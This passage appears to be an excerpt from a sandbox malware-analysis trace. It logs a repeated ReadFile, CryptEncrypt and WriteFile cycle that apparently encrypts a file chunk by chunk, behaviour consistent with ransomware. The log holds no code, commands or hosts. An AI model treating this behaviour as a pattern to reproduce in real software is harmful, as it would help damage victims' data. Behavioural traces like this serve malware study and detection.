lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.939] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.940] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.940] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.940] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.942] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.943] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.944] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.944] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.944] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.944] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.944] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.945] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.945] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.945] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.945] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.945] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.945] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.946] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.946] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 